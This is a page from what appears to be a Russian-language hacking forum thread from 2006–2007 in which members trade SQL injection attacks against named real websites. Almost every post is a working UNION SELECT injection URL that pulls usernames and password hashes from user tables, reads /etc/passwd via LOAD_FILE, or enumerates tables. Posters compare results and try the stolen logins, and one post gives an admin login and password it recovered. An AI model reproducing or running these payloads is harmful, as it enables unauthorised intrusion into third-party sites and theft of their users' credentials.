SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.rleague.com/db/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
     
  2. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    HTML:
    http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
     
    1 person likes this.
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://jah.ru/foto/showphoto.php?photo=-99+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user/*
     
    1 person likes this.
  4. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    http://mac.clanhalo.net/index.php?page=player_history&user_id=-6%20union%20select%201,concat(username,char(58),user_password)%20from%20phpbb_users/*

    Только там пароли не полностью показываются
     
  5. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    ..
     
    1 person likes this.
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90

    http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100))/*


    а че не до конца?)
     
  7. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Дракула жжет =)
    даже инъекцию не сделал нормально =)

    Польский язык не знаю..но остается ток в поле 3 подобрать логин с паролем =)
     
  8. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    не освоил я пока все эти лоад файл и чары :)
     
    1 person likes this.
  9. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.avtorinok.ru/news/news_firms.php?id=-1+union+select+1,2,3,4,5,login,password,8,9+from+users/*

    http://www.vw-club.lv/index.php?mnpg=1&subpg=2&month=11&year=-1+union+select+1,2,concat(username,char(58),password),4+from+user+limit+1,1/*

    Пасс у Админа смешной )
     
    #369 *D1VER, 1 Feb 2007
    Last edited: 1 Feb 2007
    3 people like this.
  10. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    http://notes.asdplus.ru/shop/
    около 100юзеров

    http://notes.asdplus.ru/shop/view.php?id=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14,email,nick,17,18,pass,20+from+users+limit+1,2/*

    админку не нашел=\ пасс: 31415 логин: admin
     
    1 person likes this.
  11. RaDDeaD

    RaDDeaD Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    44
    Likes Received:
    18
    Reputations:
    1
    Научился, сделал:

    Что можно сделать ещё кроме database() user() ersion() и подобных ?
     
  12. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://notes.asdplus.ru:2082/login/ тока логин и пасс не подходят :(

    для начала вот зашиврованный пасс админа
    http://pct.ru/news.htm?id=-1+union+select+1,2,3,4,user_password+from+phpbb_users+where+user_id=2/* также есть таблица users ;)
     
    #372 }{0TT@БЬ)Ч, 2 Feb 2007
    Last edited: 2 Feb 2007
  13. Ig-FoX

    Ig-FoX Elder - Старейшина

    Joined:
    28 Jul 2005
    Messages:
    60
    Likes Received:
    7
    Reputations:
    -2
    Чтото не могу таблицу найти!


    Здесь даже не пробовал!

    Здесь есть пароль нет логина:

     
    #373 Ig-FoX, 2 Feb 2007
    Last edited: 2 Feb 2007
  14. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2Rebz

    Да нет, это ты не сделал там нету таблицы admin.

    http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+from+admin/*

    http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+Rebz_lol/*
     
  15. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass,char(58),name),3,4,5,6%20,7,8,9,10,11,12,13,14,15,16,17,18+from+users+where+id=5/* Ig-FoX а это что тогда? :D
     
    #375 }{0TT@БЬ)Ч, 2 Feb 2007
    Last edited: 2 Feb 2007
  16. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    system_user() now() load_file() count(*)
     
  17. Ig-FoX

    Ig-FoX Elder - Старейшина

    Joined:
    28 Jul 2005
    Messages:
    60
    Likes Received:
    7
    Reputations:
    -2
    Это нейм, но он для авторизацыи не используется! Для авторизыцыи используется другой. по сути логин но сгенерированый уже самим форумом!
     
    1 person likes this.
  18. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.perlovka.ru/shownews.php?op=show&n_id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+21,1/*
     
    2 people like this.
  19. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://gramota.ru/idictation/idictation.php?id=-1+union+select+1,2,3,4,5/*
    http://www.fondsk.ru/article.php?id=495+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    \\\\\
    http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
    http://www.kazsu.kz/main.aspx?id=471'
    вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
    \\\\\
    http://www.vesti7.ru/news?id=9671
    http://www.nbu.com/news/read.php?id=935
    эти очень похожи на инъекцию, но подобрать кол столбцов не получилось
     
    1 person likes this.
  20. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    "Ляпис Трубецкой" :D
    http://www.lyapis.com/news_full.php?type=news&id=-99'+union+select+1,2,3,4,concat(login,0x3a,password)+from+users+limit+1,1/*
     
Thread Status:
Not open for further replies.